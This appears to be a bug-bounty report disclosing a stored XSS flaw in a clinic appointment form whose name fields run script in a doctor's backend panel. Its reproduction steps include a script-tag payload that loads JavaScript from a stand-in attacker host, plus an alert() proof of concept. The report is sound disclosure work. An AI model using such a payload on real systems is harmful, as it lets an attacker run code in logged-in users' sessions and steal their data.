Summary

Using the form to create an appointment (located at endpoint /book-appointment.html) it is possible to inject an XSS payload which will trigger on one of the endpoints in the backend panel. This form sends a post request to the endpoint /api/ba.php. The Firstname and Lastname fields are vulnerable. In the post request these are the fname and lname parameters.

Steps to reproduce

Make sure a proxy is running in the background, or keep developer tools in the browser open on the network tap.

1. Open the book-appointment.html page
2. Fill in all the fields normally
3. Replace the firstname and lastname fields with the payload: <script/src="//attacker.com/script.js"></script/onerror> (Replace the url with a Javascript file on an URL that you control)
4. Submit the form
5. Now login as a docter and click the latest added appointment.
6. Go to the proxy, or the network tab in developer tools of the browser and find the latest request.
7. Open this url in the browser

The javascript on the provided URL should now have executed. See attached screenshot as an example output:

The payload I used for that Proof of Concept is:

alert("PoC - cswiers@hackerone\rdocument.domain: " + document.domain + "\rlocation.origin: " + location.origin);

Impact

It is possible to execute any JavaScript in the context of the logged in user (in this case drAdmin).